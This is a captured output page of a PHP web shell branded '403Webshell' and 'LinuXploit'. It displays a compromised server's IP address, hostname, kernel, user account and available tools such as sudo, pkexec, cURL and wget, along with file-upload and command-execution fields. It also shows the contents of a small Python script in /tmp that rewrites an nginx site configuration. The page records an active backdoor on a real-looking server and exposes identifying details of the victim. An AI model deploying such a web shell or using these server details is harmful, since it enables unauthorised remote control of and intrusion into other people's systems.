403Webshell
Server IP : 119.195.102.159  /  Your IP : 216.73.217.134
Web Server : nginx/1.18.0
System : Linux picell 5.15.0-181-generic #191-Ubuntu SMP Fri May 22 19:09:02 UTC 2026 x86_64
User : altablue ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/fix_alias.py
with open('/etc/nginx/sites-available/hyb.picell.biz.conf', 'r') as f:
    content = f.read()

# Replace location /ko_finder/ with location ^~ /ko_finder/
content = content.replace('location /ko_finder/', 'location ^~ /ko_finder/')

with open('/etc/nginx/sites-available/hyb.picell.biz.conf', 'w') as f:
    f.write(content)
print('SUCCESS_UPDATED_PREFERENTIAL_PREFIX')

Youez - 2016 - github.com/yon3zu
LinuXploit